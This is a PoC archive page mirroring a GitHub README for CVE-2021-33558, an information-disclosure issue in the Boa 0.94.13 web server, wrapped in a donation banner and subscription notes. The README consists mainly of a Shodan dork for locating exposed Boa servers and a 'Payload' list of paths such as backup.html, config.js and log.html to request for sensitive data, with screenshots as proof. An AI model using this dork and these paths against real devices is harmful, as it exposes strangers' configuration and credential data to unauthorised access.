Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2021-33558 PoC — Boa 信息泄露漏洞

Source
https://github.com/anldori/CVE-2021-33558
Associated Vulnerability
Title:Boa 信息泄露漏洞 (CVE-2021-33558)
Description:Boa 0.94.13 allows remote attackers to obtain sensitive information via a misconfiguration involving backup.html, preview.html, js/log.js, log.html, email.html, online-users.html, and config.js. NOTE: multiple third parties report that this is a site-specific issue because those files are not part of Boa.
Description
CVE-2021-33558 POC
Readme
# CVE-2021-33558

Reference: https://www.cvedetails.com/cve/CVE-2021-33558

Shodan dork: ```product:"Boa Web Server" 0.94.13```

Payload:

```
/backup.html
/preview.html
/js/log.js
/log.html
/email.html
/online-users.html
/config.js
```

POC:

![image](https://user-images.githubusercontent.com/101538840/204190349-ebe87daa-36fd-4503-b27d-663a1365332b.png)

![image](https://user-images.githubusercontent.com/101538840/204190426-e5bb359b-d5cc-4289-a150-493913673415.png)
File Snapshot

 [4.0K]  /data/pocs/691c00f12b5d482d7efbab7674edf353ee16912e
└── [ 471]  README.md

0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →